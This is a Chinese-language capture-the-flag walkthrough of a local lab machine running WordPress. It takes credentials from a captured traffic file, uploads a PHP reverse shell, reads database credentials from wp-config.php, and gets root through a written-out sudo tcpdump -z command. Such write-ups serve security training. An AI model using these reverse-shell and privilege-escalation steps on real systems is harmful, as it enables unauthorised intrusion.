端口扫描
data:image/s3,"s3://crabby-images/2dff5/2dff563ee499311913f40ce61d06661ce3c81921" alt=""
靶机ip地址为192.168.153.158
目录扫描
data:image/s3,"s3://crabby-images/7399c/7399c5ceaa82a0ab48dee38e9071223b8e10a5b5" alt=""
访问80端口
data:image/s3,"s3://crabby-images/ee3db/ee3dbde3231d5ce30072eec0828c66d4c4027f53" alt=""
拼接访问 /ipdata 发现了一个流量包
data:image/s3,"s3://crabby-images/bf2b8/bf2b8edb97313237de819cde895db5f492660f17" alt=""
放在 wireshark 查看,找到 账号密码
账号:webdeveloper
密码:Te5eQg&4sBS!Yr$)wf%(DcAd
拼接 /wp-login.php
data:image/s3,"s3://crabby-images/1b0c5/1b0c5c17e703f567c013f013f87a9f826c9471be" alt=""
找到登录框
data:image/s3,"s3://crabby-images/ec830/ec830f8f9a772a5320f54d88e0afa9b13036d8db" alt=""
登录成功
找到后台文件上传功能点
data:image/s3,"s3://crabby-images/dc051/dc051d6545c2d3accabb22cfbfaec3274c44e05b" alt=""
利用kali生成反弹shell
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
data:image/s3,"s3://crabby-images/78fd9/78fd91e2139a9de19c8820a96a9ddc370e7ad668" alt=""
vim php-reverse-shell.php
将ip地址改成kali的ip
data:image/s3,"s3://crabby-images/450fe/450fe5db6b5856a6bd0922e843059af8dd15fb7f" alt=""
上传文件
data:image/s3,"s3://crabby-images/61176/61176221172834aacc3fa50c7d26f66331407b9b" alt=""
data:image/s3,"s3://crabby-images/8e9e1/8e9e1ed1f6d1b68cbcfb888943eb203489f774f7" alt=""
上传的文件在wp-content/uploads/目录下
data:image/s3,"s3://crabby-images/76349/763498f56e1cab13ad66ba45e24f3e82ac65c05c" alt=""
kali监听
data:image/s3,"s3://crabby-images/93cdf/93cdfd8163cd301b6f0f1d0fe44bf60d0ce15d68" alt=""
反弹成功
data:image/s3,"s3://crabby-images/4eaba/4eabaded79e32084f58178eca61e136a3f8df751" alt=""
获得交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
data:image/s3,"s3://crabby-images/152ea/152eafcc14bdd6712d9f52236bc379b8068be5fb" alt=""
/var/www/html/目录下 ,查看 wp-config.php 文件
data:image/s3,"s3://crabby-images/179e3/179e39e5e7f376fb8a78ba8872fafb14b67868f6" alt=""
得到数据库账号密码
账号:webdeveloper
密码:MasterOfTheUniverse
ssh连接 ssh webdeveloper@192.168.153.158
data:image/s3,"s3://crabby-images/45e79/45e79cc9946c0aa2cb4420812bd09849167bdac7" alt=""
连接成功
sudo提权 sudo -l
data:image/s3,"s3://crabby-images/d4bbf/d4bbf87343881195cba78b7dee8dcd2150f53c19" alt=""
找到 php-reverse-shell.php文件位置
data:image/s3,"s3://crabby-images/61f00/61f004e195e36799da68f180b0569e913ba4fbb6" alt=""
COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
data:image/s3,"s3://crabby-images/faa8a/faa8a55f4047903c7873dd6e33f8a8cf3c6f2911" alt=""
反弹成功
data:image/s3,"s3://crabby-images/941b8/941b8cd6ed9ee8fcabed23068b3e2a4524359ac8" alt=""
为root权限
data:image/s3,"s3://crabby-images/206a6/206a6251dab06a6900e7ab0584322a1c7ef1b4fe" alt=""